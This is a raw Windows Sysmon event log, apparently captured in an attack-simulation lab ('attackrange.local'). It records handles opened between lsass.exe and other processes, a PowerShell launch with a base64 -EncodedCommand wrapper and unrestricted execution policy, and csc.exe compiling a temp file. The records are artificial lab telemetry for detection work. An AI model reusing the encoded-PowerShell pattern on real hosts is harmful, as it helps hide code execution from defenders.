15:52:45.100{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004155Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCD-5FA1-CD00-000000008801}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004154Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004153Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004152Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004151Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004150Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004149Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004148Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004147Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004146Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004145Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CCD-5FA1-CD00-000000008801}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004144Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7CCC-5FA1-CB00-000000008801}35083444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCD-5FA1-CD00-000000008801}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF8DCA1B68F) 154100x80000000000000004143Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.014{D28789B6-7CCD-5FA1-CD00-000000008801}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\2lwsxlaa.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000004142Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.006{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2lwsxlaa.cmdline2020-11-03 15:52:45.006 11241100x80000000000000004141Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:45.006{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2lwsxlaa.dll2020-11-03 15:52:45.006 10341000x80000000000000004280Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.915{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004279Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.915{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004278Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.868{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hnjhgq5w.5ud.ps12020-11-03 15:52:46.868 10341000x80000000000000004277Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.868{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004276Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004275Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004274Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004273Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004272Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004271Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004270Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 